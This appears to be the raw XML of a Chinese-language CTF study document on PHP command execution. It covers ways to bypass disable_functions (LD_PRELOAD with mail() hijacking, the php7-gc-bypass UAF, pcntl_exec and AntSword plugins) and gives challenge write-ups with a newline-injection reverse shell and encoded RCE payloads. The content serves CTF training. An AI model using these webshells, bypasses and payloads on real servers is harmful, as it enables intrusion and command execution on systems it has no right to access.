        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>; }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unsetenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:t>//删除系统变量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system(cmdline);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7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编写shell.php;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t>&lt;?php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$cmd = $_REQUEST[</w:t>
      </w:r>
      <w:r>
        <w:t>"cmd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>];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$out_path = $_REQUEST[</w:t>
      </w:r>
      <w:r>
        <w:t>"outpath"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">]; 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$evil_cmdline = $cmd.</w:t>
      </w:r>
      <w:r>
        <w:t>" &gt; "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>.$out_path.</w:t>
      </w:r>
      <w:r>
        <w:t>" 2&gt;&amp;1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">; 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t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"&lt;br /&gt;&lt;b&gt;cmdline: &lt;/b&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">.$evil_cmdline; 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putenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"EVIL_CMDLINE="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>.$evil_cmdline);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$so_path = $_REQUEST[</w:t>
      </w:r>
      <w:r>
        <w:t>"sopath"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">]; 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putenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">.$so_path); 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mail(</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"&lt;br /&gt;&lt;b&gt;output: &lt;/b&gt;&lt;br /&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>.nl2br(file_get_contents($out_path));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将两个文件上传到/tmp目录，执行文件包含并传入参数拿到flag.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利用方法3：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不劫持函数绕过，GCC 有个 C 语言扩展修饰符attribute((constructor))，可以让由它修饰的函数在 main() 之前执行，若它出现在共享对象中时，那么一旦共享对象被系统加载，立即将执行attribute((constructor)) 修饰的函数。那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>只需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找到php环境中存在执行系统命令的函数、且putenv函数未被禁用的情况下，就可以绕过disable_function。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编写hack.c，并编译；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t>#include &lt;unistd.h&gt;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t>void payload(void)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17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system(</w:t>
      </w:r>
      <w:r>
        <w:t>"ls /var/www/html &gt; /tmp/smity"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>);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}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__attribute__ ((__constructor__)) </w:t>
      </w:r>
      <w:r>
        <w:t>void exec(void)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>{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</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (getenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">){ </w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>; }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unsetenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>);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payload();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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17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7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编写shell.php；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t>&lt;?php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7"/>
        </w:rPr>
        <w:t>putenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD=/tmp/hack3.so"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">); 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7"/>
        </w:rPr>
        <w:t>mail(</w:t>
      </w:r>
      <w:r>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:t>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上传在/tmp目录，执行文件包含访问，再查看/tmp/smity结果。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利用方法4：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直接使用蚁剑的插件在/var/www/html目录生成PHP文件（需要具有权限），然后用蚁剑连接，即可执行命令。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GC UAF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：实现了代码执行，未实现命令执行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5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用条件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Style w:val="17"/>
        </w:rPr>
        <w:t>php版本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="1200" w:firstLineChars="600"/>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 - all versions to </w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="1200" w:firstLineChars="600"/>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.2.19 </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>released: 30 May 2019</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="1200" w:firstLineChars="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.3.6 </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>released: 30 May 2019</w:t>
      </w:r>
      <w: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步骤：上传脚本，修改命令，文件包含访问脚本即可。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"https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php"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https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php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cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="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4"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>利用未禁用函数（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pcntl_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24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15"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：实现了代码执行，未实现命令执行，且没有禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pcntl_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：PHP 4 &gt;= 4.2.0, PHP 5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5"/>
        </w:rPr>
        <w:t>一般步骤</w:t>
      </w:r>
      <w:r>
        <w:t>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利用蚁剑连接shell代码执行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将下面的php代码传上去然后访问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cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在公网服务器监听端口，实现反弹shell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用蚁剑连接一句话，传shell.php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840105"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1333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公网服务器监听端口即可。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搭好环境才发现题目环境都是duocker，没有python也没有bash所以复现不了。。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绕过disable_functions的方法还有很多，蚁剑的插件也很强大基本的类型都能适用。更多详情可以参考：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"https://blog.csdn.net/qq_44657899/article/details/109171760"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16"/>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/qq_44657899/article/details/109171760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b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc23004"/>
      <w:bookmarkStart w:id="45" w:name="_Toc10719"/>
      <w:bookmarkStart w:id="46" w:name="_Toc14202"/>
      <w:bookmarkStart w:id="47" w:name="_Toc21080"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>例题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc22691"/>
      <w:bookmarkStart w:id="49" w:name="_Toc28008"/>
      <w:bookmarkStart w:id="50" w:name="_Toc2625"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>死亡ping命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50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打开题目看起来是一道很经典的ping命令命令执行；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747895" cy="2547620"/>
            <wp:effectExtent l="0" t="0" r="698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测试一下命令链接符；，|，&amp; 发现都给过滤了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339590" cy="1814830"/>
            <wp:effectExtent l="0" t="0" r="3810" b="139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用%0a成功绕过，但是并没有回显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657090" cy="1743710"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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无回显的rce我们可以考虑用反弹shell来解，但是题目是docker并没有bash。于是尝试在自己的公网服务器上写一个.sh脚本，用nc监听其在目标机器上反弹的信息。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253740" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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在靶机上下载1.sh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839970" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="635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897755" cy="1903095"/>
            <wp:effectExtent l="0" t="0" r="9525" b="19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在服务器上监听8089端口，在靶机上执行1.sh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02000" cy="1852295"/>
            <wp:effectExtent l="0" t="0" r="5080" b="698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找到了flag，之后我再写一个2.sh来反弹FLAG的内容拿到flag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482340" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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93920" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc349"/>
      <w:bookmarkStart w:id="52" w:name="_Toc8538"/>
      <w:bookmarkStart w:id="53" w:name="_Toc21896"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[极客大挑战 2019]RCE ME</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/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69110"/>
            <wp:effectExtent l="0" t="0" r="317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根据源码可知，题目过滤了所有的数字和字母。由于还有payload还有长度限制，先用取反构造一个phpinfo()试试看。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3124200" cy="65532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?code=(~%8F%97%8F%96%91%99%90)();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成功得到了phpinfo，并发现过滤了system()等函数；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4872990" cy="1198245"/>
            <wp:effectExtent l="0" t="0" r="381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考虑构造一个shell看看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3386455" cy="1936750"/>
            <wp:effectExtent l="0" t="0" r="12065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48690"/>
            <wp:effectExtent l="0" t="0" r="254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/?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6);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用蚁剑链接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562350"/>
            <wp:effectExtent l="0" t="0" r="3175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发现根目录下有flag和readflag文件，但是打开flag并没有东西，应该是要执行readflag来读取flag,但是因为过滤了很多函数，shell用不了，必须绕过。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06140" cy="141732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直接使用蚁剑的插件来绕过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85160" cy="23622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执行readflag得到flag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81400" cy="678180"/>
            <wp:effectExtent l="0" t="0" r="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解法二：uaf脚本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利用php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令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将exp中执行的命令改为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/readflag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，利用蚁剑上传到/tmp/shell.php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3545" cy="2227580"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270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8160" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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再利用刚刚写入的一句话执行文件包含shell.php得到flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4491355" cy="1839595"/>
            <wp:effectExtent l="0" t="0" r="4445" b="444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利用环境变量 LD_preload + mail劫持so来执行系统命令绕过disable_functions。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利用蚁剑上传bypass_disablefunc.php和bypass_disablefunc_x64.so文件；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https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1819910"/>
            <wp:effectExtent l="0" t="0" r="3810" b="889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构造新的payload,得到flag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?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&amp;_=assert&amp;__=include(%27/tmp/bypass_disablefunc.php%27)&amp;cmd=/readflag&amp;outpath=/tmp/tmpfile&amp;sopath=/tmp/bypass_disablefunc_x64.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1158875"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1460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54" w:name="_Toc13829"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后记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现在很多的题目都不会是单纯的命令执行，而更多的都是结合现实中爆出的C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>VE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来出题，比如Thinkphp的命令执行漏</w:t>
      </w:r>
      <w:bookmarkStart w:id="55" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>洞，php7-gc-bypass漏洞等等。平时还是要多注意积累。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ZnpqEEwIAABU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rApzRR2dPn65fLtx+X7ZwId&#10;AGqtX8BvZ+EZutemg/Oo91DGubvKqXhjIgI7oD5f4RVdIDwGzWfzeQ4Th218IH/2FG6dD2+EUSQK&#10;BXXYX4KVnbY+9K6jS6ymzaaRMu1QatIW9OblqzwFXC1ILjVqxCH6ZqMUun03TLY35RmDOdNzw1u+&#10;aVB8y3x4ZA5kQMMgeHjAUUmDImaQKKmN+/Q3ffTHjmClpAW5CqrBfkrkW43dRR6OghuF/Sjoo7oz&#10;YOsUH8fyJCLABTmKlTPqI1i/jjVgYpqjUkHDKN6FnuD4NVys18npaF1zqPsAMM+ysNU7y2OZCKS3&#10;62MAmAnjCFCPyoAbuJe2NPyTSO5f38nr6Tev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mZ6ahBMCAAAV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F029C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D28F029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81C300E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D81C30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B3B9B6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB3B9B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137FDE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FF137F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A14CBA6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1A14CB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5A8B0F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1D5A8B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8D0247B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="28D02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B30689A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2B3068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2B587EC3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2B587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0D43727"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="40D437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8290D94"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="68290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F4F44"/>
    <w:rsid w:val="113E4572"/>
    <w:rsid w:val="1DB16755"/>
    <w:rsid w:val="22327651"/>
    <w:rsid w:val="294268A7"/>
    <w:rsid w:val="503F4F44"/>
    <w:rsid w:val="555D6DDE"/>
    <w:rsid w:val="6CF00768"/>
    <w:rsid w:val="74D6603B"/>
    <w:rsid w:val="7EF72D26"/>
    <w:rsid w:val="7FC2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exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑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新宋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paragraph" w:customStyle="1" w:styleId="19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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme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2021-07-28T14:15:00Z</dcterms:created>
  <dc:creator>Zoro</dc:creator>
  <cp:lastModifiedBy>chenser</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-30T00:44:18Z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BDCEADAB6FB343799AFE9DF02C4EA2A7</vt:lpwstr>
  </property>
</Properties>
</file>